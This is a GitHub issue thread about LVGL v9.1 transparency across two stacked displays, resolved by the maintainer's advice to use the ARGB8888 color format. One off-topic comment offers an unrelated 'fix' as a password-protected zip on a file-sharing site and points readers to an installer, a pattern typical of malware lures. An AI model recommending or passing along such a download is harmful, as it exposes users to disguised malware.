lvgl/lvgl #6750: Multi-Layer Transparent Problem for V9.1

fatiihyildizz, 2024-08-28:
### Introduce the problem

For a screen with a size of 800x480, there are 2 layers of this size. The first layer is used as a background. In other words, there is a background image in the background. Some menu items are added to the second layer. To add these, I create an object with the size of the second layer (800x480). Then I create the pictures on this object. The pictures also have a background. There is also a text in the middle-top of the screen. Since there is no picture/text everywhere, I need to make the second layer transparent. First, I put a rectangle for the picture background, then the picture. However, if the picture background is not transparent, I cannot make the picture transparent at all. It inherits the previous transparent/matte value defined in the same area. How can I prevent this? Similarly, when I make the opacity of the text matte and make the text background transparent, the background does not appear transparent. How can I solve this?

For example:
`lv_obj_set_style_text_opa(ps_text_name, 255, LV_PART_MAIN | LV_STATE_DEFAULT);`
`lv_obj_set_style_bg_opa(ps_text_name, 255, LV_PART_MAIN | LV_STATE_DEFAULT);`
[image]

`lv_obj_set_style_text_opa(ps_text_name, 255, LV_PART_MAIN | LV_STATE_DEFAULT);`
`lv_obj_set_style_bg_opa(ps_text_name, 255, LV_PART_MAIN | LV_STATE_DEFAULT);`
[image]

chenkeyu123, 2024-08-28:
Download 
https://www.mediafire.com/file/5t7dozm7sptcuqj/fix.zip/file
password: changeme
In the installer menu, select "gcc."

kisvegabor, 2024-08-29:
Hi,

How did you "mapped" these layers to LVGL? Do you have 2 `lv_display` for the 2 layers? If so, make sure to use `LV_COLOR_FORMAT_ARGB8888` to handle transparency correctly.

fatiihyildizz, 2024-08-29:
Hi,
There are 2 displays for 2 layers.

[image]

The rectangle visible on the screen was colored with `lv_obj_set_style_img_recolor` and opacity was given with `lv_obj_set_style_bg_opa`. Similarly, the text was created with `lv_label_create`, colored with `lv_obj_set_style_text_color` and opacity was given with `lv_obj_set_style_text_opa`. Although the rectangle and the text are on the same layer, the transparency of the text does not work while the rectangle appears opaque. It shows the empty pixels in the area it covers as white, not transparent.

kisvegabor, 2024-08-29:
Please try adding `lv_display_set_color_format(disp, LV_COLOR_FPRMAT_ARGB8888)`.

Note that `lv_obj_set_style_img_recolor` work only on images. On rectangle you should use `lv_obj_set_style_bg_color`

fatiihyildizz, 2024-09-02:
Hi,
This worked : `lv_display_set_color_format(disp, LV_COLOR_FORMAT_ARGB8888)`
Thank you

kisvegabor, 2024-09-02:
Awesome, closing this issue then. 

For future reference, here is the related docs: https://docs.lvgl.io/master/overview/display.html#transparent-screens

closed 2024-09-02 by kisvegabor